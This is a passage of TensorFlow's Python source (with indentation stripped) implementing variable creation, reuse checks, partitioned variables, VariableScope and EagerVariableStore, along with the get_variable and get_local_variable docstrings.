Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any(p < 1 for p in partitions):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape.dims[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
if not context.executing_eagerly() or self._store_eager_variables:
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# ResourceVariables don't have an op associated with so no traceback
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("%s Originally defined at:\n\n%s" % (err_msg, "".join(
traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
# NOTES:Do we need to support for handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=self.reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
print(container.variables) # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
if collections:
collections += [ops.GraphKeys.LOCAL_VARIABLES]
else:
collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
